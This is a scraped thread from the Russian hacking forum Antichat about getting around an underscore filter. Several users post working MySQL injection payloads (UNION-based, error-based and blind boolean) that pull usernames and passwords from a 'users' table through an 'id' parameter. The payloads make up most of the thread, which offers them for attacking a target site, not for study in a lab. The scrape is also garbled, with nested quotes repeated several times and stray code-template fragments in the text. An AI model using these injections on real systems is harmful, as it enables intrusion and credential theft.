ANTICHAT - Фильтрация нижнего подчеркивания

Ответ дан , тема закрыта. Если у ТС, что то не получится пусть отпишет мне в пм.

Цитата:

Сообщение от Expl0ited

Цитата:

Сообщение от listika

Цитата:

Сообщение от None

Если у ТС, что то не получится пусть отпишет мне в пм.

Не успела отправить сообщение...

Цитата:

Сообщение от nikp

UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:

Код:

id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+

Она еще и слепая. Использую такую конструкцию:

Код:

id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+

В таком случае ваш способ можно применить попробовать?

" if author else f"

Цитата:

listika said:

Цитата:

Сообщение от None

Если у ТС, что то не получится пусть отпишет мне в пм.

Не успела отправить сообщение...

Цитата:

Сообщение от nikp

Код:

id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+

Она еще и слепая. Использую такую конструкцию:

Код:

id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+

В таком случае ваш способ можно применить попробовать?

У тебя вывод в ошибке, или же всетаки она совсем слепая?
если она совсем слепая тогда вот валидная конструкция

Код:

id=480 and 1=if(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,1)='a',1,2)--+

Работать будет при условии, если в таблице users 4 колонки, и первый символ во второй колонке и второй записи таблицы равен 'a' вернет валидную страницу под id=480, если же нет то вернет пустую страницу, т.к. не выполнится условие. И перебирать в таком духе.
Если же у тебя вывод в ошибке, тогда:

Код:

id=480 and (select(max(1))from(mysql.user)group+by(concat(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,60),0x00,floor(rand(0)*2))))--+

" if author else f"

Цитата:

Expl0ited said:

Цитата:

Сообщение от listika

Цитата:

Сообщение от None

Если у ТС, что то не получится пусть отпишет мне в пм.

Не успела отправить сообщение...

Цитата:

Сообщение от nikp

Код:

id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+

Она еще и слепая. Использую такую конструкцию:

Код:

id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+

В таком случае ваш способ можно применить попробовать?

" if author else f"

Цитата:

listika said:

Цитата:

Сообщение от None

Если у ТС, что то не получится пусть отпишет мне в пм.

Не успела отправить сообщение...

Цитата:

Сообщение от nikp

Код:

id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+

Она еще и слепая. Использую такую конструкцию:

Код:

id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+

В таком случае ваш способ можно применить попробовать?

У тебя вывод в ошибке, или же всетаки она совсем слепая?
если она совсем слепая тогда вот валидная конструкция

Код:

id=480 and 1=if(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,1)='a',1,2)--+

Код:

id=480 and (select(max(1))from(mysql.user)group+by(concat(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,60),0x00,floor(rand(0)*2))))--+